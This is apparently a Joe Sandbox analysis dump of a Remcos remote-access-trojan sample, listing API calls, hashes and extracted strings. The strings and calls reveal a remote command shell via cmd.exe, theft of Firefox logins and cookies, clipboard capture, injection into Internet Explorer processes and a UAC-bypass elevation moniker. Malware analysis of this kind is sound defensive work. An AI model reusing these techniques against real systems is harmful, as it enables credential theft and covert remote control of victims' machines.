                                        • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0041BAB8
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Window$ForegroundText
                                        • String ID:
                                        • API String ID: 29597999-0
                                        • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                        • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                        • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                        • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                        • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                          • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                        • String ID:
                                        • API String ID: 1170566393-0
                                        • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                        • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                        • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                        • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                        APIs
                                          • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                        • _free.LIBCMT ref: 00450140
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                        • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                        • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                        • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                        • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                        • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                        • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                        APIs
                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                        • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                        • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                        • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                        • API String ID: 1067849700-181434739
                                        • Opcode ID: eed5674f21a4eef5d351282a9d2df638c21affdc62bc016a13256b3273593cb3
                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                        • Opcode Fuzzy Hash: eed5674f21a4eef5d351282a9d2df638c21affdc62bc016a13256b3273593cb3
                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                        • CloseHandle.KERNEL32 ref: 00405A23
                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                        • CloseHandle.KERNEL32 ref: 00405A45
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                        • API String ID: 2994406822-18413064
                                        • Opcode ID: 13363ddcd6a14ab02b987944c79cdeab18914c86fa514d23f6098caa89b3988f
                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                        • Opcode Fuzzy Hash: 13363ddcd6a14ab02b987944c79cdeab18914c86fa514d23f6098caa89b3988f
                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                          • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                        • API String ID: 3018269243-13974260
                                        • Opcode ID: ec87f336c2b408306c41aada36fdf53bb23932e81f2324c776ad30bae8eba27e
                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                        • Opcode Fuzzy Hash: ec87f336c2b408306c41aada36fdf53bb23932e81f2324c776ad30bae8eba27e
                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 1164774033-3681987949
                                        • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                        • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                        APIs
                                        • OpenClipboard.USER32 ref: 004168C2
                                        • EmptyClipboard.USER32 ref: 004168D0
                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                        • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                        • CloseClipboard.USER32 ref: 00416955
                                        • OpenClipboard.USER32 ref: 0041695C
                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                        • CloseClipboard.USER32 ref: 00416984
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                        • String ID: !D@
                                        • API String ID: 3520204547-604454484
                                        • Opcode ID: fea27c55c69ede12a1baf9e6355ec21cd56ce7331c7cfd7b3a0e760041973ea9
                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                        • Opcode Fuzzy Hash: fea27c55c69ede12a1baf9e6355ec21cd56ce7331c7cfd7b3a0e760041973ea9
                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$File$FirstNext
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 3527384056-432212279
                                        • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                        • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4B9
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                        • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                        • API String ID: 3756808967-1743721670
                                        • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                        • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                        • API String ID: 0-1861860590
                                        • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                        • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                        APIs
                                        • _wcslen.LIBCMT ref: 00407521
                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Object_wcslen
                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                        • API String ID: 240030777-3166923314
                                        • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                        • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                        • String ID:
                                        • API String ID: 3587775597-0
                                        • Opcode ID: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                        • Opcode Fuzzy Hash: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                        • String ID: lJD$lJD$lJD
                                        • API String ID: 745075371-479184356
                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 1164774033-405221262
                                        • Opcode ID: 0461f3560dc0d6eeac0ce167accbc0eb794526df5cd1a385b4c4cd5d367a624b
                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                        • Opcode Fuzzy Hash: 0461f3560dc0d6eeac0ce167accbc0eb794526df5cd1a385b4c4cd5d367a624b
                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                        • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2341273852-0
                                        • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                        • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
